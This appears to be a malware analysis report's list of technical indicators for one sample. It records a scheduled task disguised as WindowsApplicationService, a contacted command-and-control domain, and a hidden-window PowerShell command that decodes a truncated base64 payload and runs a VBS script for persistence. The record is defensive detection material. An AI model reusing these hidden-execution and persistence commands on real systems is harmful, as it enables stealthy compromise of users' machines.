Technical Information
- <SYSTEM32>\tasks\windowsapplicationservice
- 'ex#.###texadvising.com':80
- DNS ASK ex#.###texadvising.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JGJ3dnlmeHggPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoICRid3...' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 12 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs
- '<SYSTEM32>\taskeng.exe' {F2572D90-1FC5-4F36-9C04-EE310FDF877B} S-1-5-21-1960123792-2022915161-3775307078-1001:ogjtjwquwe\user:Interactive:[1]